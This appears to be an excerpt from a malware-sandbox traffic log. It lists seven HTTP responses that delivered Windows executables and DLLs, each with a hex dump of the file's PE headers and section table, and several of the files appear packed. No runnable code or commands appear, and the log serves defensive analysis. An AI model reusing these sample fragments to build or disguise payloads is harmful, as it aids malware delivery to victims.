                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 11:10:33 GMTContent-Type: application/octet-streamContent-Length: 1800704Last-Modified: Thu, 21 Nov 2024 10:54:04 GMTConnection: keep-aliveETag: "673f114c-1b7a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 22 01 00 00 00 00 00 00 60 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 69 00 00 04 00 00 eb 62 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2a 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 77 61 63 72 61 75 62 00 e0 19 00 00 70 4f 00 00 dc 19 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 67 74 72 79 69 6f 6a 00 10 00 00 00 50 69 00 00 04 00 00 00 54 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 69 00 00 22 00 00 00 58 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 11:10:42 GMTContent-Type: application/octet-streamContent-Length: 921600Last-Modified: Thu, 21 Nov 2024 10:52:12 GMTConnection: keep-aliveETag: "673f10dc-e1000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 10 3f 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 60 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 80 e4 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 9c a5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 9c a5 00 00 00 40 0d 00 00 a6 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Nov 2024 11:10:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 11:10:49 GMTContent-Type: application/octet-streamContent-Length: 2811392Last-Modified: Thu, 21 Nov 2024 10:52:38 GMTConnection: keep-aliveETag: "673f10f6-2ae600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 8a f7 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 70 7a 70 63 70 6e 68 00 a0 2a 00 00 a0 00 00 00 86 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 68 76 63 6c 61 72 6d 00 20 00 00 00 40 2b 00 00 04 00 00 00 c0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Nov 2024 11:11:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Nov 2024 11:11:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Nov 2024 11:11:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
